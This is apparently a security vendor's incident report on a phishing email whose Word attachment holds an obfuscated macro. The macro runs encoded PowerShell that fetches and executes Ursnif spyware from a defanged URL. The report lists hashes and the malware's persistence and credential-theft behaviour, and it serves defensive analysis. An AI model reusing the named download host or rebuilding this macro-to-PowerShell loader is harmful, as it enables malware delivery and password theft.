Perception Point’s platform recently caught an advanced threat directed at one of our customers within a Microsoft Word file. Our Incident Analysis report below provides a detailed understanding of the attack and the damage it could have caused.
Key observations regarding this attack:
- An attempt to evade AVs by using several advanced techniques.
- An attempt to run malware in the form of an executable file.
- An attempt to steal personal data, such as usernames and passwords.
One of our customers received an email that had been flagged “malicious” by Perception Point’s platform. This report includes a “what-if” analysis to examine the potential effect of the attack, in case the malicious file had not been blocked.
- In order to gain the recipient’s trust, the attacker sent the email from an account that seemed similar to an executive that they regularly conduct business with. The domain name was the same except for the extension; “domain.net” instead of “domain.com”. The “domain.net” was not found as a known mail server.
- Perception Point’s platform:
- Our platform detected the malicious content and flagged the email as “malicious”, due to an attachment that contained a .doc file.
- The MD5 of the file is: fdd7f9367f976ceb07279648f373a93b
- Perception Point’s team uploaded the file to VirusTotal since it was not updated as malicious.
Perception Point’s engines identified the malicious activity by tracking down Macro commands. We noticed the following anomalies: the macro is obfuscated and the code itself is too long for no legitimate reason.
The command lines as extracted by Perception Point’s platform
Dynamic Analysis of the Attachment.
- Researching the Word .doc file in a contained environment shows that the macro runs an encrypted PowerShell command.
- The PowerShell is base64 encoded.
- Once the first layer decoded, the resulting payload is as follows:
- For the purpose of this analysis, we removed the last command “invoke-expression”, to prevent any actual malicious activity and then ran the command:
- The PowerShell script downloads an .exe file from hxxp://zzajqwnewq.com/GGKO/chibura.php?l=anz9.yarn, renames it with a random name, saves it in a temp folder, and then executes it.
Executable File Analysis.
- The executable file downloaded was identified as “Spyware” in Virustotal (File hash: 5eb5a460b9a8ce8c00b54e53e14eec78):
- The file is classified as
TrojanSpy:Win32/Ursnif. TrojanSpy:Win32/Ursnif is a generic malware family that contains capabilities such as keylogging*, data theft, C&C.
*) A “Keylogger” (denotes for “keystroke logger”) is a computer software that tracks or logs the keys struck on your keyboard, typically in a covert manner so the user does not know that his/her actions are being monitored. This is usually done with malicious intent to collect the user’s account information, credit card numbers, usernames, passwords, and other private data.
- TrojanSpy:Win32/Ursnif has been around since November 20, 2010, but this specific sample was submitted to VT on June 12, 2018:
- Persistence techniques:
- The executable file copies itself to the Administrator/AppData/Roaming/Microsoft/Dfdtents folder. This folder is hidden by default in Windows file system setting, hence it is an invisible folder to the user.
- Creates a registry key for persistence.
- The malware collects data, such as usernames and passwords from browsers, and saves it in a hidden folder.
- In order to test the malware, we simulated a login activity to a Gmail account. As can be seen in the screenshot below, the malware had stolen the username and the matching password.
This attack could have been very damaging for our customer, as it was well-disguised and very effective once released. Learn more about how our hardware-assisted platform is able to catch such attacks here: